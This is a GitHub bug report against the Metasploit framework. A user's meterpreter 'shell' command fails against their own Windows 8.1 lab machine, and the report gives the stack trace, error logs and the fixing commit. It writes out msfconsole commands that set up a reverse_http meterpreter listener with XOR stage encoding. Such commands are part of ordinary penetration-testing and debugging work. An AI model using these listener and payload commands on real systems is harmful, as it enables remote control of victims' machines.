target : Local win8.1 64bit No AV
local: linux mint Metasploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 192.168.159.229
msf5 exploit(multi/handler) > set lport 8080
msf5 exploit(multi/handler) > set set EnableStageEncoding true
msf5 exploit(multi/handler) > set EnableStageEncoding true
msf5 exploit(multi/handler) > set stageencoder x64/xor
msf5 exploit(multi/handler) > exploit
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] Error running command shell: ArgumentError wrong number of arguments (given 6, expected 5)
msf5 exploit(multi/handler) > version
Framework: 5.0.87-dev-
Console : 5.0.87-dev-
[04/27/2020 20:12:38] [i(0)] core: Default data service found. Attempting to connect...
[04/27/2020 20:12:38] [e(0)] core: No database definition for environment production
[04/27/2020 20:12:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:12:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:12:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[04/27/2020 20:12:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[04/27/2020 20:13:35] [i(0)] core: windows/x64/meterpreter/reverse_http: iteration 1: Successfully encoded with encoder x64/xor (size is 207495)
[04/27/2020 20:15:55] [e(0)] meterpreter: Error running command shell: ArgumentError wrong number of arguments (given 6, expected 5)
[04/27/2020 20:15:55] [d(0)] meterpreter: Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/channels/pools/stream_pool.rb:36:in `initialize'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:183:in `new'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:183:in `execute'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:233:in `cmd_execute'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:315:in `rescue in cmd_shell'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:310:in `cmd_shell'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:153:in `run'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/interactive.rb:51:in `interact'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/core.rb:1389:in `cmd_sessions'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/exploit.rb:215:in `cmd_exploit'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:158:in `run'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:17:in `<main>'
[04/27/2020 20:19:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:19:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:19:38] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[04/27/2020 20:19:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[04/27/2020 20:19:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:19:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[04/27/2020 20:19:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[04/27/2020 20:19:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
Edited to update formatting to make this easier to read.
env
target : Local win8.1 64bit No AV
local: linux mint Metasploitoperating
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http msf5 exploit(multi/handler) > set lhost 192.168.159.229 msf5 exploit(multi/handler) > set lport 8080 msf5 exploit(multi/handler) > set set EnableStageEncoding true msf5 exploit(multi/handler) > set EnableStageEncoding true msf5 exploit(multi/handler) > set stageencoder x64/xor msf5 exploit(multi/handler) > exploit meterpreter > shell [-] Failed to spawn shell with thread impersonation. Retrying without it. [-] Error running command shell: ArgumentError wrong number of arguments (given 6, expected 5)version
msf5 exploit(multi/handler) > version Framework: 5.0.87-dev- Console : 5.0.87-dev-msfconsole error log
[04/27/2020 20:12:38] [i(0)] core: Default data service found. Attempting to connect... [04/27/2020 20:12:38] [e(0)] core: No database definition for environment production [04/27/2020 20:12:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:12:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:12:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [04/27/2020 20:12:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [04/27/2020 20:13:35] [i(0)] core: windows/x64/meterpreter/reverse_http: iteration 1: Successfully encoded with encoder x64/xor (size is 207495) [04/27/2020 20:15:55] [e(0)] meterpreter: Error running command shell: ArgumentError wrong number of arguments (given 6, expected 5) [04/27/2020 20:15:55] [d(0)] meterpreter: Call stack: /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/channels/pools/stream_pool.rb:36:in `initialize' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:183:in `new' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:183:in `execute' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:233:in `cmd_execute' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:315:in `rescue in cmd_shell' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:310:in `cmd_shell' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:153:in `run' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact' /opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact' /opt/metasploit-framework/embedded/framework/lib/rex/ui/interactive.rb:51:in `interact' /opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/core.rb:1389:in `cmd_sessions' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/exploit.rb:215:in `cmd_exploit' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:158:in `run' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start' /opt/metasploit-framework/bin/../embedded/framework/msfconsole:17:in `<main>' [04/27/2020 20:19:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:19:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:19:38] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [04/27/2020 20:19:38] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [04/27/2020 20:19:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:19:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [04/27/2020 20:19:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [04/27/2020 20:19:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
https://github.com/rapid7/metasploit-framework/commit/078652749dabaf2ac599a749235ef56a9e7895b4 newest version has solve this
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It鈥檚 been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Closing this issue as @FunnyWolf mentioned that https://github.com/rapid7/metasploit-framework/commit/078652749dabaf2ac599a749235ef56a9e7895b4 solves this issue.